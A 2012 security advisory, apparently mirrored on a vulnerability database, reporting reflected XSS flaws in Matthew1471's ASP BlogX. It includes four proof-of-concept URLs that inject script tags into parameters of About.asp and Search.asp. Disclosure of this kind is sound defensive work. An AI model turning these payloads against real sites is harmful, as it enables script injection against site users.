Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27906
HistoryApr 09, 2012 - 12:00 a.m.

Matthew1471s ASP BlogX - XSS Vulnerabilities

2012-04-0900:00:00
vulners.com
58
JSON

Title: Matthew1471s ASP BlogX - XSS Vulnerabilities

Software : Matthew1471s ASP BlogX

Software Version : 12 August 2008

Vendor: http://blogx.co.uk/

Vulnerability Published : 2012-03-26

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N)

Bug Description :
Matthew1471s ASP BlogX(version update : 12 August 2008) is vulnerable to XSS.

Proof Of Concept :
1)ShowOriginal in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal="><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b

2)ShowNew in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=Y&ShowNew="><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b

3)ShowChanges in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="><SCRIPT>alert("demonalex");</SCRIPT>

4)Search in Search.asp , PoC:
http://VICTIM/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / [email protected]
Pentester/Researcher
Dark2S Security Team/PolyU.HK

JSON